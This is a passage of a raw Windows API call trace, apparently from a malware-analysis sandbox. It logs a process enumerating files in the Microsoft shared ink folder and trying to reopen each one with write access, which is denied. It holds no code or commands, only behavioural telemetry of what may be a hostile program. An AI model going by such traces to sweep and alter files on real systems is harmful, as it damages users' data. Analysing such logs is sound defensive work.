0xffffffff [0085.413] GetLastError () returned 0x5 [0085.413] GetLastError () returned 0x5 [0085.413] SetLastError (dwErrCode=0x5) [0085.413] GetLastError () returned 0x5 [0085.413] SetLastError (dwErrCode=0x5) [0085.413] GetLastError () returned 0x5 [0085.413] SetLastError (dwErrCode=0x5) [0085.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0085.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0085.413] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.413] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.413] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.413] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0085.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0085.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0085.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.415] AreFileApisANSI () returned 1 [0085.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll", lpUsedDefaultChar=0x0) returned 62 [0085.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0085.415] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.415] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.415] AreFileApisANSI () returned 1 [0085.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0085.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll") returned 62 [0085.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0085.426] GetFileType (hFile=0x354) returned 0x1 [0085.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.426] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.426] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.426] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.426] CloseHandle (hObject=0x354) returned 1 [0085.426] AreFileApisANSI () returned 1 [0085.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e3e8 [0085.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll") returned 62 [0085.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.427] GetLastError () returned 0x5 [0085.427] GetLastError () returned 0x5 [0085.427] SetLastError (dwErrCode=0x5) [0085.427] GetLastError () returned 0x5 [0085.427] SetLastError (dwErrCode=0x5) [0085.427] GetLastError () returned 0x5 [0085.427] SetLastError (dwErrCode=0x5) [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0085.427] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.427] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.427] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xc2004e62, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x7b000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0085.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0085.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0085.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0085.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0085.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0085.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0085.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0085.428] AreFileApisANSI () returned 1 [0085.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll", lpUsedDefaultChar=0x0) returned 69 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0085.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.428] AreFileApisANSI () returned 1 [0085.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0085.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0085.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 69 [0085.429] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0085.429] GetFileType (hFile=0x354) returned 0x1 [0085.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0085.429] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.429] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.429] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.430] CloseHandle (hObject=0x354) returned 1 [0085.430] AreFileApisANSI () returned 1 [0085.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0085.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0085.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 69 [0085.430] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.430] GetLastError () returned 0x5 [0085.430] GetLastError () returned 0x5 [0085.430] SetLastError (dwErrCode=0x5) [0085.430] GetLastError () returned 0x5 [0085.430] SetLastError (dwErrCode=0x5) [0085.430] GetLastError () returned 0x5 [0085.430] SetLastError (dwErrCode=0x5) [0085.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0085.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0085.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.430] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd51e08b5, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd51e08b5, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x178200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0085.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0085.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0085.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0085.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.431] AreFileApisANSI () returned 1 [0085.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe", lpUsedDefaultChar=0x0) returned 59 [0085.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0085.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.431] AreFileApisANSI () returned 1 [0085.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0085.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69e30 [0085.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 59 [0085.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0085.432] GetFileType (hFile=0x354) returned 0x1 [0085.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0085.432] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.433] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.433] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.433] CloseHandle (hObject=0x354) returned 1 [0085.433] AreFileApisANSI () returned 1 [0085.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0085.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0085.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 59 [0085.433] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.433] GetLastError () returned 0x5 [0085.433] GetLastError () returned 0x5 [0085.433] SetLastError (dwErrCode=0x5) [0085.433] GetLastError () returned 0x5 [0085.434] SetLastError (dwErrCode=0x5) [0085.434] GetLastError () returned 0x5 [0085.434] SetLastError (dwErrCode=0x5) [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0085.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.434] FindNextFileW (in: 